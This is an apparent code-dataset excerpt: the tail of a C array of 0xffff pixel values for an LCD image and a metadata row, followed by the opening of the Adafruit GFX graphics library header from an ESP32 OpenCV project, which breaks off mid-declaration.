0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff
};
| 1,229,353 | lcd_image | h | es | c | code | {"qsc_code_num_words": 153612, "qsc_code_num_chars": 1229353.0, "qsc_code_mean_word_length": 5.99983074, "qsc_code_frac_words_unique": 0.02519334, "qsc_code_frac_chars_top_2grams": 0.60930553, "qsc_code_frac_chars_top_3grams": 0.85970318, "qsc_code_frac_chars_top_4grams": 1.09577864, "qsc_code_frac_chars_dupe_5grams": 0.85338188, "qsc_code_frac_chars_dupe_6grams": 0.83620826, "qsc_code_frac_chars_dupe_7grams": 0.82154754, "qsc_code_frac_chars_dupe_8grams": 0.81055199, "qsc_code_frac_chars_dupe_9grams": 0.80251854, "qsc_code_frac_chars_dupe_10grams": 0.7961712, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.33964466, "qsc_code_frac_chars_whitespace": 0.12534317, "qsc_code_size_file_byte": 1229353.0, "qsc_code_num_lines": 485.0, "qsc_code_num_chars_line_max": 2596.0, "qsc_code_num_chars_line_mean": 2534.74845361, "qsc_code_frac_chars_alphabet": 0.51749155, "qsc_code_frac_chars_comments": 0.0, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.04761905, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.74966324, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.0, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 0.0, "qsc_codec_score_lines_no_logic": 0.0, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": null} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 1, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 1, "qsc_code_frac_chars_dupe_6grams": 1, "qsc_code_frac_chars_dupe_7grams": 1, "qsc_code_frac_chars_dupe_8grams": 1, "qsc_code_frac_chars_dupe_9grams": 1, "qsc_code_frac_chars_dupe_10grams": 1, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 1, "qsc_code_num_chars_line_mean": 1, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 1, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 1, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 0, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
0015/ESP32-OpenCV-Projects | esp32/examples/color_code/components/lcd/Adafruit-GFX-Library/Adafruit_GFX.h | #ifndef _ADAFRUIT_GFX_H
#define _ADAFRUIT_GFX_H
#if ARDUINO >= 100
#include "Arduino.h"
#include "Print.h"
#else
#include "WProgram.h"
#endif
#include "gfxfont.h"
class Adafruit_GFX : public Print {
public:
Adafruit_GFX(int16_t w, int16_t h); // Constructor
// This MUST be defined by the subclass:
virtual void drawPixel(int16_t x, int16_t y, uint16_t color) = 0;
// TRANSACTION API / CORE DRAW API
// These MAY be overridden by the subclass to provide device-specific
// optimized code. Otherwise 'generic' versions are used.
virtual void startWrite(void);
virtual void writePixel(int16_t x, int16_t y, uint16_t color);
virtual void writeFillRect(int16_t x, int16_t y, int16_t w, int16_t h, uint16_t color);
virtual void writeFastVLine(int16_t x, int16_t y, int16_t h, uint16_t color);
virtual void writeFastHLine(int16_t x, int16_t y, int16_t w, uint16_t color);
virtual void writeLine(int16_t x0, int16_t y0, int16_t x1, int16_t y1, uint16_t color);
virtual void endWrite(void);
// CONTROL API
// These MAY be overridden by the subclass to provide device-specific
// optimized code. Otherwise 'generic' versions are used.
virtual void setRotation(uint8_t r);
virtual void invertDisplay(boolean i);
// BASIC DRAW API
// These MAY be overridden by the subclass to provide device-specific
// optimized code. Otherwise 'generic' versions are used.
virtual void
// It's good to implement those, even if using transaction API
drawFastVLine(int16_t x, int16_t y, int16_t h, uint16_t color),
drawFastHLine(int16_t x, int16_t y, int16_t w, uint16_t color),
fillRect(int16_t x, int16_t y, int16_t w, int16_t h, uint16_t color),
fillScreen(uint16_t color),
// Optional and probably not necessary to change
drawLine(int16_t x0, int16_t y0, int16_t x1, int16_t y1, uint16_t color),
drawRect(int16_t x, int16_t y, int16_t w, int16_t h, uint16_t color);
// These exist only with Adafruit_GFX (no subclass overrides)
void
drawCircle(int16_t x0, int16_t y0, int16_t r, uint16_t color),
drawCircleHelper(int16_t x0, int16_t y0, int16_t r, uint8_t cornername,
uint16_t color),
fillCircle(int16_t x0, int16_t y0, int16_t r, uint16_t color),
fillCircleHelper(int16_t x0, int16_t y0, int16_t r, uint8_t cornername,
int16_t delta, uint16_t color),
drawTriangle(int16_t x0, int16_t y0, int16_t x1, int16_t y1,
int16_t x2, int16_t y2, uint16_t color),
fillTriangle(int16_t x0, int16_t y0, int16_t x1, int16_t y1,
int16_t x2, int16_t y2, uint16_t color),
drawRoundRect(int16_t x0, int16_t y0, int16_t w, int16_t h,
int16_t radius, uint16_t color),
fillRoundRect(int16_t x0, int16_t y0, int16_t w, int16_t h,
int16_t radius, uint16_t color),
drawBitmap(int16_t x, int16_t y, const uint8_t bitmap[],
int16_t w, int16_t h, uint16_t color),
drawBitmap(int16_t x, int16_t y, const uint8_t bitmap[],
int16_t w, int16_t h, uint16_t color, uint16_t bg),
drawBitmap(int16_t x, int16_t y, uint8_t *bitmap,
int16_t w, int16_t h, uint16_t color),
drawBitmap(int16_t x, int16_t y, uint8_t *bitmap,
int16_t w, int16_t h, uint16_t color, uint16_t bg),
drawXBitmap(int16_t x, int16_t y, const uint8_t bitmap[],
int16_t w, int16_t h, uint16_t color),
drawGrayscaleBitmap(int16_t x, int16_t y, const uint8_t bitmap[],
int16_t w, int16_t h),
drawGrayscaleBitmap(int16_t x, int16_t y, uint8_t *bitmap,
int16_t w, int16_t h),
drawGrayscaleBitmap(int16_t x, int16_t y,
const uint8_t bitmap[], const uint8_t mask[],
int16_t w, int16_t h),
drawGrayscaleBitmap(int16_t x, int16_t y,
uint8_t *bitmap, uint8_t *mask, int16_t w, int16_t h),
drawRGBBitmap(int16_t x, int16_t y, const uint16_t bitmap[],
int16_t w, int16_t h),
drawRGBBitmap(int16_t x, int16_t y, uint16_t *bitmap,
int16_t w, int16_t h),
drawRGBBitmap(int16_t x, int16_t y,
const uint16_t bitmap[], const uint8_t mask[],
int16_t w, int16_t h),
drawRGBBitmap(int16_t x, int16_t y,
uint16_t *bitmap, uint8_t *mask, int16_t w, int16_t h),
drawChar(int16_t x, int16_t y, unsigned char c, uint16_t color,
uint16_t bg, uint8_t size),
setCursor(int16_t x, int16_t y),
setTextColor(uint16_t c),
setTextColor(uint16_t c, uint16_t bg),
setTextSize(uint8_t s),
setTextWrap(boolean w),
cp437(boolean x=true),
setFont(const GFXfont *f = NULL),
getTextBounds(char *string, int16_t x, int16_t y,
int16_t *x1, int16_t *y1, uint16_t *w, uint16_t *h),
getTextBounds(const __FlashStringHelper *s, int16_t x, int16_t y,
int16_t *x1, int16_t *y1, uint16_t *w, uint16_t *h);
#if ARDUINO >= 100
virtual size_t write(uint8_t);
#else
virtual void write(uint8_t);
#endif
int16_t height(void) const;
int16_t width(void) const;
uint8_t getRotation(void) const;
// get current cursor position (get rotation safe maximum values, using: width() for x, height() for y)
int16_t getCursorX(void) const;
int16_t getCursorY(void) const;
protected:
void
charBounds(char c, int16_t *x, int16_t *y,
